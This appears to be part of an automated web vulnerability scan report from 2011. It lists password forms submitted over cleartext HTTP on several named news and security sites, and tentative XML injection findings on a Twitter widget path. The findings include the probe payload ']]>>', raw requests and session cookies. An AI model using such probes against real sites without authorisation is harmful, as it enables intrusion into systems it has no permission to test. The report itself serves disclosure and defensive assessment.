http://www.scmagazine.com.au/Tools/Email.aspx
http://www.securelist.com/en/
http://www.securelist.com/en/blog
http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability
http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability
http://www.securelist.com/en/find
http://www.securelist.com/en/polls
http://www.securelist.com/en/weblog
http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

4.1. http://account.theregister.co.uk/register/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://account.theregister.co.uk
Path:	/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://account.theregister.co.uk/register/

The form contains the following password fields:

password
confirm_password

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:39 GMT
Server: Apache/2.2.16 (Debian) mod_apreq2-20090110/2.8.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 31753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h2>

<form action="http://account.theregister.co.uk/register/" method="post" id="acc-edit">
<input type="hidden" name="product" value="theregister_newsletter">
...[SNIP]...
<td><input type="password" name="password" value="" size="30"></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" size="30"></td>
...[SNIP]...

4.2. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31652 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

4.3. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://forum.kaspersky.com/index.php?act=Login&CODE=01&CookieDate=1

The form contains the following password field:

PassWord

Request

GET /index.php HTTP/1.1
Host: forum.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:00:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: session_id=82c6300bfd526a46875731ac58df8e9e; path=/
Content-Length: 164725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
<td align="right" valign="middle">

           <form action="http://forum.kaspersky.com/index.php?act=Login&CODE=01&CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/kl/login-button.gif" />
...[SNIP]...

4.4. http://virusalert.nl/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://virusalert.nl
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://virusalert.nl/?show=login

The form contains the following password field:

wachtwoord

Request

GET / HTTP/1.1
Host: virusalert.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.5. http://www.2linkme.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.2linkme.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.2linkme.com/?

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.2linkme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42978
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Sun, 04 Sep 2011 14:05:50 GMT
Connection: close

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="it" >
<head>
<meta name="verify-v1" content="yNECeZAlEb/41nI6IfpxFB/WLGtIjqwE
...[SNIP]...
<div style="margin-top:0px; top:0px; position: absolute; width:100%;">
   <form action="?" method="post" name="Login" >
       <div style="border-bottom:1px; border-bottom-color:#FF0000; border-bottom-style:solid; background-color:#FF0000; background-image:url(images/sfondo_Search_Rosso.gif); height:35px; margin:0px; paddi
...[SNIP]...
<input class="in" type="text" name="email" value="" size="16" style="font-weight:bold; font-family:Verdana;" title="email" onChange="document.Login.user.value=this.value;" /> 
               password: <input class="in" type="password" name="password" value="" size="16" style="font-weight:bold; font-family:Verdana;" title="Password" /> 
               <input type="submit" value="Accedi" class="search" style="font-size:12px;" />
...[SNIP]...

4.6. http://www.h-online.com/userdb/sso previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.h-online.com
Path:	/userdb/sso

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.h-online.com/userdb/sso

The form contains the following password field:

password

Request

GET /userdb/sso HTTP/1.1
Host: www.h-online.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:41 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<meta http-
...[SNIP]...
</p>

<form method="post" action="/userdb/sso" class="login">

<fieldset>
...[SNIP]...
<label><input type="password" name="password" size="20" /> Password</label>
...[SNIP]...

4.7. http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.scmagazine.com.au/News/Article.aspx?id=268907

The form contains the following password fields:

ctl00$ctl00$LoginModalCtrl$PasswordTextbox_Login
ctl00$ctl00$RegistrationModalCtrl$PasswordTextbox_Reg
ctl00$ctl00$RegistrationModalCtrl$ConfirmPasswordTextbox_Reg

Request

GET /News/268907,kaspersky-website-vulnerable-to-xss.aspx HTTP/1.1
Host: www.scmagazine.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:50 GMT
Content-Length: 102651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Kaspersky
...[SNIP]...


<form name="aspnetForm" method="post" action="Article.aspx?id=268907" id="aspnetForm">
<div>
...[SNIP]...
</div>
<input name="ctl00$ctl00$LoginModalCtrl$PasswordTextbox_Login" type="password" id="ctl00_ctl00_LoginModalCtrl_PasswordTextbox_Login" class="textbox" style="width:160px;" />
<div id="rfvPasswordMsg_Login" style="display: none;" class="validationMsg">
...[SNIP]...
</div>
<input name="ctl00$ctl00$RegistrationModalCtrl$PasswordTextbox_Reg" type="password" id="ctl00_ctl00_RegistrationModalCtrl_PasswordTextbox_Reg" class="textbox" />
<div id="rfvPasswordMsg_Reg" style="display: none;" class="validationMsg">
...[SNIP]...
</div>
<input name="ctl00$ctl00$RegistrationModalCtrl$ConfirmPasswordTextbox_Reg" type="password" id="ctl00_ctl00_RegistrationModalCtrl_ConfirmPasswordTextbox_Reg" class="textbox" />
<div id="rfvConfirmPasswordMsg_Reg" style="display: none;" class="validationMsg">
...[SNIP]...

4.8. http://www.scmagazine.com.au/Tools/Email.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/Tools/Email.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.scmagazine.com.au/Tools/Email.aspx

The form contains the following password fields:

ctl00$ctl00$LoginModalCtrl$PasswordTextbox_Login
ctl00$ctl00$RegistrationModalCtrl$PasswordTextbox_Reg
ctl00$ctl00$RegistrationModalCtrl$ConfirmPasswordTextbox_Reg

Request

GET /Tools/Email.aspx HTTP/1.1
Host: www.scmagazine.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:12:15 GMT
Connection: close
Content-Length: 70107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
EmailFrien
...[SNIP]...


<form name="aspnetForm" method="post" action="Email.aspx" id="aspnetForm">
<div>
...[SNIP]...
</div>
<input name="ctl00$ctl00$LoginModalCtrl$PasswordTextbox_Login" type="password" id="ctl00_ctl00_LoginModalCtrl_PasswordTextbox_Login" class="textbox" style="width:160px;" />
<div id="rfvPasswordMsg_Login" style="display: none;" class="validationMsg">
...[SNIP]...
</div>
<input name="ctl00$ctl00$RegistrationModalCtrl$PasswordTextbox_Reg" type="password" id="ctl00_ctl00_RegistrationModalCtrl_PasswordTextbox_Reg" class="textbox" />
<div id="rfvPasswordMsg_Reg" style="display: none;" class="validationMsg">
...[SNIP]...
</div>
<input name="ctl00$ctl00$RegistrationModalCtrl$ConfirmPasswordTextbox_Reg" type="password" id="ctl00_ctl00_RegistrationModalCtrl_ConfirmPasswordTextbox_Reg" class="textbox" />
<div id="rfvConfirmPasswordMsg_Reg" style="display: none;" class="validationMsg">
...[SNIP]...

4.9. http://www.securelist.com/en/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/login

The form contains the following password field:

PASSWD

Request

GET /en/ HTTP/1.1
Host: www.securelist.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=AAAACU5jg7oxN1RZENJsAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:00:27 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:kavhtml=207810888;vlyrub=1;vlxhtml=101
Content-Length: 36254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Securelist - Information about Viruses, Hackers and Spam</title>

<link rel="alternate" type="application/rss+xml" t
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<span KLMark="loc_msg:vl2login">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

4.10. http://www.securelist.com/en/blog previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/login

The form contains the following password field:

PASSWD

Request

GET /en/blog HTTP/1.1
Host: www.securelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:12:28 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Vary: Accept-Encoding
X-Showed: kaspen:vl:klblog=208193098,208193107,208193100,540,208193090,208193110,208193101,539,541,208193108;vlyrub=8;vlxhtml=92,71
Content-Length: 71152

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Blog - Securelist</title>

<link rel="alternate" type="application/rss+xml" title="Securelist / Blogs" href="rss/web
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<span KLMark="loc_msg:vl2login">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

4.11. http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog/2312/Another_live_XSS_vulnerability

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/blog/2312/login

The form contains the following password field:

PASSWD

Request

GET /en/blog/2312/Another_live_XSS_vulnerability HTTP/1.1
Host: www.securelist.com
Proxy-Connection: keep-alive
Referer: http://www.securelist.com/en/find?words=xss&searchtype=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=AAAACU5jg7oxN1RZENJsAg==; __utma=1.503086894.1315144674.1315144674.1315144674.1; __utmb=1.4.10.1315144674; __utmc=1; __utmz=1.1315144674.1.1.utmcsr=support.kasperskyamericas.com|utmccn=(referral)|utmcmd=referral|utmcct=/corporate/contact-information

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:13:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:klblog=2312;vlyrub=8;vlxhtml=101
Content-Length: 21589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Another live XSS vulnerability - Securelist</title>

<link rel="alternate" type="application/rss+xml" title="Securel
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<span KLMark="loc_msg:vl2login">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

4.12. http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/blog/2312/Another_live_XSS_vulnerability

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/blog/2312/login

The form contains the following password field:

PASSWD

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:13:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
X-Showed: kaspen:vl:klblog=2312;vlyrub=8;vlxhtml=101
Content-Length: 21589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Another live XSS vulnerability - Securelist</title>

<link rel="alternate" type="application/rss+xml" title="Securel
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<input type="hidden" name="REFERER" value="blog/2312/Another_live_XSS_vulnerability#add">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

4.13. http://www.securelist.com/en/find previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/find

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/login

The form contains the following password field:

PASSWD

Request

GET /en/find?words=xss&searchtype= HTTP/1.1
Host: www.securelist.com
Proxy-Connection: keep-alive
Referer: http://www.securelist.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=AAAACU5jg7oxN1RZENJsAg==; __utma=1.503086894.1315144674.1315144674.1315144674.1; __utmb=1.2.10.1315144674; __utmc=1; __utmz=1.1315144674.1.1.utmcsr=support.kasperskyamericas.com|utmccn=(referral)|utmcmd=referral|utmcct=/corporate/contact-information

Response

4.14. http://www.securelist.com/en/polls previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/polls

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/login

The form contains the following password field:

PASSWD

Request

GET /en/polls HTTP/1.1
Host: www.securelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:12:34 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Vary: Accept-Encoding
X-Showed: kaspen:vl:vlyrub=25;vlxhtml=92
Content-Length: 15604

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Polls - Securelist</title>

<base href="http://www.securelist.com/en/">

<link rel="stylesheet" type="text/css" hr
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<span KLMark="loc_msg:vl2login">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

4.15. http://www.securelist.com/en/weblog previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.securelist.com
Path:	/en/weblog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.securelist.com/en/login

The form contains the following password field:

PASSWD

Request

GET /en/weblog HTTP/1.1
Host: www.securelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 14:12:41 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Vary: Accept-Encoding
X-Showed: kaspen:vl:klblog=208193098,208193107,208193100,540,208193090,208193110,208193101,539,541,208193108;vlyrub=8;vlxhtml=92,71
Content-Length: 71152

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Blog - Securelist</title>

<link rel="alternate" type="application/rss+xml" title="Securelist / Blogs" href="rss/web
...[SNIP]...
<td class="cntr" style="padding-left:18px;padding-right:18px;">

<form action="login" method="post">
<span KLMark="loc_msg:vl2login">
...[SNIP]...
<p><input type="password" name="PASSWD" value="" class="w100"></p>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.stylemepretty.com/wp-login.php

The form contains the following password field:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
</div>
       <form action="/wp-login.php" method="post">
       <div style="margin:5px; color:#4F969F;">
...[SNIP]...
<div style="border:1px solid #C2DADA;margin: 5px;background:#fff;">
       <input style="background:transparent url(http://cache.stylemepretty.com/wp-content/themes/SMP-BoF-Theme/images/input_bg.png) repeat-x;border:1px solid #FFFFFF;color:#25313C;font-size:18px;padding:7px;width:300px" type="password" name="pwd" />
       </div>
...[SNIP]...

5. XML injection previous next
There are 3 instances of this issue:

/widgets/images/t.gif [REST URL parameter 1]
/widgets/images/t.gif [REST URL parameter 2]
/widgets/images/t.gif [REST URL parameter 3]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

5.1. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform.twitter.com
Path:	/widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1315138412470&count=horizontal&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&text=Kaspersky%20website%20vulnerable%20to%20XSS&url=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&via=SCMagazineAU&twttr_referrer=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sun, 04 Sep 2011 12:12:59 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]>>/images/t.gif</Key><RequestId>069140DFAD1EEA25</RequestId>
...[SNIP]...

5.2. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform.twitter.com
Path:	/widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1315138412470&count=horizontal&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&text=Kaspersky%20website%20vulnerable%20to%20XSS&url=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&via=SCMagazineAU&twttr_referrer=http%3A%2F%2Fwww.scmagazine.com.au%2FNews%2F268907%2Ckaspersky-website-vulnerable-to-xss.aspx&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
